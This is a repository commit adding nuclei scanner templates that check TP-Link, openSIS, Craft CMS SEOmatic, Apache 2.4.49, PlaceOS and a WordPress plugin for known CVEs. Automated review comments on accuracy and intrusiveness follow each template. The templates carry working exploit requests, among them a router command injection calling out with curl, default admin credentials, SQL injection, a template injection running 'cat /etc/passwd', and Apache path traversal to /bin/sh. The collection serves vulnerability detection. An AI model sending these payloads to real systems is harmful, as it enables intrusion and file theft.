Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing 1,000 changed files with 52,639 additions and 0 deletions.
@@ -0,0 +1,67 @@ | ||
id: CVE-2021-41653 | ||
|
||
info: | ||
name: TP-Link - OS Command Injection | ||
author: gy741 | ||
severity: critical | ||
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. | ||
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". | ||
reference: | ||
- https://k4m1ll0.com/cve-2021-41653.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653 | ||
- https://www.tp-link.com/us/press/security-advisory/ | ||
- http://tp-link.com | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2021-41653 | ||
cwe-id: CWE-94 | ||
epss-score: 0.95374 | ||
epss-percentile: 0.99172 | ||
cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* | ||
metadata: | ||
max-request: 2 | ||
vendor: tp-link | ||
product: tl-wr840n_firmware | ||
tags: cve,cve2021,tplink,rce,router | ||
variables: | ||
useragent: '{{rand_base(6)}}' | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /cgi?2 HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: text/plain | ||
Referer: http://{{Hostname}}/mainFrame.htm | ||
Cookie: Authorization=Basic YWRtaW46YWRtaW4= | ||
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6 | ||
dataBlockSize=64 | ||
timeout=1 | ||
numberOfRepetitions=4 | ||
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}') | ||
X_TP_ConnName=ewan_ipoe_d | ||
diagnosticsState=Requested | ||
- | | ||
POST /cgi?7 HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: text/plain | ||
Referer: http://{{Hostname}}/mainFrame.htm | ||
Cookie: Authorization=Basic YWRtaW46YWRtaW4= | ||
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0 | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol # Confirms the HTTP Interaction | ||
words: | ||
- "http" | ||
|
||
- type: word | ||
part: interactsh_request | ||
words: | ||
- "User-Agent: {{useragent}}" | ||
|
||
# digest: 490a004630440220752d1a35c5152419dacd9908a794244472a635bd8142f442d7cc7c88b204879b0220494cf93f6429b61a87d6c82bcd93eed1ea759f32f72eb7adfbbf425ed650b72c:922c64590222798bb761d5b6d8e72950 |
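Review bot: `cwe-id: CWE-94` (code injection) does not match the `name` and the `host=$(...)` payload, which describe an OS command injection; CWE-78 is the usual mapping for that, so please align the two. The check also only works while the router still has its factory password, because both requests hard-code `Cookie: Authorization=Basic YWRtaW46YWRtaW4=` (admin:admin); that precondition belongs in `description` or `tags`, otherwise a clean run on a device with a changed password reads as "not vulnerable". Finally, the match depends on the router reaching `{{interactsh-url}}`, so egress-filtered devices will produce false negatives; a short comment next to `part: interactsh_protocol` saying so would help operators interpret a miss.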
@@ -0,0 +1,52 @@ | ||
id: CVE-2021-41691 | ||
|
||
info: | ||
name: openSIS Student Information System 8.0 SQL Injection | ||
author: Bartu Utku SARP | ||
severity: high | ||
description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. | ||
remediation: | | ||
Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). | ||
reference: | ||
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 | ||
- https://www.exploit-db.com/exploits/50637 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 | ||
classification: | ||
cve-id: CVE-2021-41691 | ||
metadata: | ||
max-request: 2 | ||
tags: sqli,auth,edb,cve,cve2021,opensis | ||
variables: | ||
num: "999999999" | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /index.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{BaseURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
USERNAME={{username}}&PASSWORD={{password}}&language=en&log= | ||
- | | ||
POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{BaseURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 | ||
attack: pitchfork | ||
payloads: | ||
username: | ||
- student | ||
password: | ||
- student@123 | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")' | ||
- 'status_code_2 == 200' | ||
condition: and | ||
|
||
# digest: 4b0a00483046022100d69a704ad325691722917a459e5254a92c6c17b1de1bf9f45e49b81414445ce5022100f9ddad6028eb7b1ad78e82fc59de1d3a40a132b8da744cbf8057af607d694558:922c64590222798bb761d5b6d8e72950 |
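Review bot: the third reference `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169` drops the last digit of the CVE id and points at the wrong record; it should read `...?name=CVE-2021-41691`. The `classification` block is also missing the `cvss-metrics`, `cvss-score` and `cwe-id` fields the neighbouring templates carry (CWE-89 for SQL injection), and `description` should say that the check first logs in with the `student` / `student@123` payloads, so it only fires where that demo account exists and the `auth` tag is meaningful. Minor wording: "in POST request" should be "in a POST request".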
@@ -0,0 +1,60 @@ | ||
id: CVE-2021-41749 | ||
|
||
info: | ||
name: CraftCMS SEOmatic - Server-Side Template Injection | ||
author: iamnoooob,ritikchaddha | ||
severity: critical | ||
description: | | ||
In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution. | ||
reference: | ||
- https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41749 | ||
- https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2021-41749 | ||
cwe-id: CWE-94 | ||
epss-score: 0.46254 | ||
epss-percentile: 0.97078 | ||
cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* | ||
metadata: | ||
verified: true | ||
max-request: 2 | ||
vendor: nystudio107 | ||
product: seomatic | ||
framework: craft_cms | ||
shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"' | ||
tags: cve,cve2021,craftcms,cms,ssti | ||
variables: | ||
num1: "{{rand_int(40000, 44800)}}" | ||
num2: "{{rand_int(40000, 44800)}}" | ||
result: "{{to_number(num1)*to_number(num2)}}" | ||
marker: "{{randstr}}" | ||
|
||
http: | ||
- raw: | ||
- |+ | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}} | ||
Cache-Control: max-age=0 | ||
- |+ | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb | ||
Cache-Control: max-age=0 | ||
skip-variables-check: true | ||
stop-at-first-match: true | ||
redirects: true | ||
max-redirects: 2 | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)' | ||
- 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")' | ||
- 'status_code == 200' | ||
condition: and | ||
# digest: 490a0046304402203e7ed489ed44dbaf94282ae2b22ff831afb32e7fedc10b06aa445ecd91ac653802202e3fd014457cffd465c17a035306d3f49f3ba9ac5b84ccdbebdc4e0fd9db0dd2:922c64590222798bb761d5b6d8e72950 |
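Review bot: the second raw request injects `{{['cat /etc/passwd']|filter('system')}}` and therefore executes a shell command on the target, while the first request's arithmetic probe (`{{num1}}*{{num2}}` checked against `{{result}}`) already proves template evaluation. Consider dropping the second request, or at minimum stating in `description` that the template runs a command so operators can decide whether that is acceptable in their environment; the Apache 2.4.49 template in this same commit shows the less intrusive pattern of echoing a marker string. Smaller points: `description` has a stray full stop in "perform a Server-Side. Template Injection", and `contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")` has a misplaced space before the comma.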
@@ -0,0 +1,18 @@ | ||
id: CVE-2021-41773 | ||
info: | ||
name: RCE in Apache HTTP Server 2.4.49 | ||
author: RafaelCaria | ||
severity: critical | ||
tags: cve,cve2021,rce | ||
|
||
requests: | ||
- method: POST | ||
path: | ||
- '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' | ||
body: 'echo;id' | ||
|
||
matchers: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" |
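Review bot: the regex `"(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b"` is a double-quoted YAML scalar, and in that context `\b` is YAML's backspace escape (0x08), not a regex word boundary, so the second alternative can never match real ping output; the other escapes on the same line are correctly doubled (`\\d`, `\\.`) and `\b` should be `\\b` as well. This file also uses the legacy `requests:` key while every other template in the commit uses `http:`, and it has no `description`, `reference` or `classification`. Since it carries the same `id: CVE-2021-41773` as the fuller template that follows, keeping both produces a duplicate template id; the minimal one should be dropped in favour of the other.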
@@ -0,0 +1,64 @@ | ||
id: CVE-2021-41773 | ||
|
||
info: | ||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution | ||
author: daffainfo,666asd | ||
severity: high | ||
description: | | ||
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. | ||
remediation: | | ||
Upgrade Apache to version 2.4.50 or apply the relevant patch provided by the vendor. | ||
reference: | ||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 | ||
- https://twitter.com/ptswarm/status/1445376079548624899 | ||
- https://twitter.com/h4x0r_dz/status/1445401960371429381 | ||
- https://github.com/blasty/CVE-2021-41773 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2021-41773 | ||
cwe-id: CWE-22 | ||
epss-score: 0.97424 | ||
epss-percentile: 0.99925 | ||
cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 3 | ||
vendor: apache | ||
product: http_server | ||
shodan-query: Apache 2.4.49 | ||
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev | ||
variables: | ||
cmd: "echo COP-37714-1202-EVC | rev" | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
echo Content-Type: text/plain; echo; {{cmd}} | ||
stop-at-first-match: true | ||
|
||
matchers-condition: or | ||
matchers: | ||
- type: word | ||
name: RCE | ||
words: | ||
- "CVE-2021-41773-POC" | ||
|
||
- type: regex | ||
name: LFI | ||
regex: | ||
- "root:.*:0:0:" | ||
# digest: 4b0a00483046022100de8497f1c24918a9c7323beae8664ca742c5cbbe3657cab12758caa182e891d1022100fb74960000ce185cdd192c430b79f5f167632783e588f447813ee1a57fe0e4ec:922c64590222798bb761d5b6d8e72950 |
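Review bot: with `matchers-condition: or` and no status matcher, the bare `regex: - "root:.*:0:0:"` fires on any response body that happens to contain a passwd-style line, so an error page or search result that echoes such text would be reported as LFI. Tying that match to the response status, for example a `type: dsl` matcher with `regex("root:.*:0:0:", body) && status_code == 200` in place of the plain regex, would cut those false positives while leaving the RCE word matcher untouched. On the positive side, `cmd: "echo COP-37714-1202-EVC | rev"` is a good non-destructive execution proof: it only reverses a string and is matched by the `CVE-2021-41773-POC` word. Note that this file shares `id: CVE-2021-41773` with the shorter template before it; one of the two should go.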
@@ -0,0 +1,46 @@ | ||
id: CVE-2021-41826 | ||
|
||
info: | ||
name: PlaceOS 1.2109.1 - Open Redirection | ||
author: geeknik | ||
severity: medium | ||
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect. | ||
remediation: | | ||
Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability. | ||
reference: | ||
- https://github.com/PlaceOS/auth/issues/36 | ||
- https://www.exploit-db.com/exploits/50359 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41826 | ||
- http://packetstormsecurity.com/files/164345/PlaceOS-1.2109.1-Open-Redirection.html | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2021-41826 | ||
cwe-id: CWE-601 | ||
epss-score: 0.93913 | ||
epss-percentile: 0.98922 | ||
cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* | ||
metadata: | ||
max-request: 1 | ||
vendor: place | ||
product: placeos_authentication | ||
tags: redirect,edb,cve,packetstorm,cve2021,placeos | ||
|
||
http: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/auth/logout?continue=//interact.sh" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' | ||
|
||
- type: status | ||
status: | ||
- 302 | ||
- 301 | ||
condition: or | ||
# digest: 4a0a00473045022100d0e3eef1d719b2eb5c45b70f78a97e5f08d65f2710ffb6af5b76c0a8108313af022042150ccc71dc5f934dc0bfc975778815f7def825f498e7317e0b430533fd20cf:922c64590222798bb761d5b6d8e72950 |
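Review bot: the version numbers do not agree with each other: `name` says `PlaceOS 1.2109.1`, `description` says "before 1.29.10.0", and `remediation` says "update to PlaceOS 1.2109.2 or higher". These look like two different version schemes (the authentication service versus the platform release), so the template should say which component each number refers to; otherwise an operator cannot tell from the output whether their deployment is on a fixed version. The `Location` regex is reasonable, but `continue=//interact.sh` is a hard-coded hostname rather than `{{interactsh-url}}`; that is fine here because only the response header is inspected and no callback is awaited, and a one-line comment saying so would prevent confusion with the templates in this commit that do wait for an interaction.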
@@ -0,0 +1,57 @@ | ||
id: CVE-2021-41836 | ||
|
||
info: | ||
name: "Fathom Analytics <= 3.0.4 - Stored Cross-Site Scripting" | ||
author: topscoder | ||
severity: medium | ||
description: "The Fathom Analytics WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and escaping via the $site_id parameter found in the ~/fathom-analytics.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 3.0.4. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled." | ||
reference: | ||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-41836 | ||
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2641005%40fathom-analytics&new=2641005%40fathom-analytics&sfp_email=&sfph_mail= | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 4.8 | ||
cve-id: CVE-2021-41836 | ||
metadata: | ||
fofa-query: "wp-content/plugins/fathom-analytics/" | ||
google-query: inurl:"/wp-content/plugins/fathom-analytics/" | ||
shodan-query: 'vuln:CVE-2021-41836' | ||
tags: cve,wordpress,wp-plugin,fathom-analytics,medium | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/fathom-analytics/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "fathom-analytics" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 3.0.4') |
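Review bot: the two `extractors` blocks are identical apart from `internal: true`; that is the usual nuclei pattern for feeding `compare_versions` while still printing the version in the output, but a short comment on the second one would stop the next reader from treating it as a copy-paste leftover. The `classification` block lacks `cwe-id` (CWE-79 for stored cross-site scripting) and `metadata` lacks the `max-request: 1` field the other templates carry; `tags` includes `medium`, which duplicates `severity` and is not used as a tag elsewhere in this commit, and omits `cve2021`. It is also worth stating in `description` that this is a version check against `readme.txt`, not an exploitation check: a site whose `Stable tag` reads 3.0.4 or lower is reported as vulnerable regardless of any backported fix, and the result should be confirmed before being acted on.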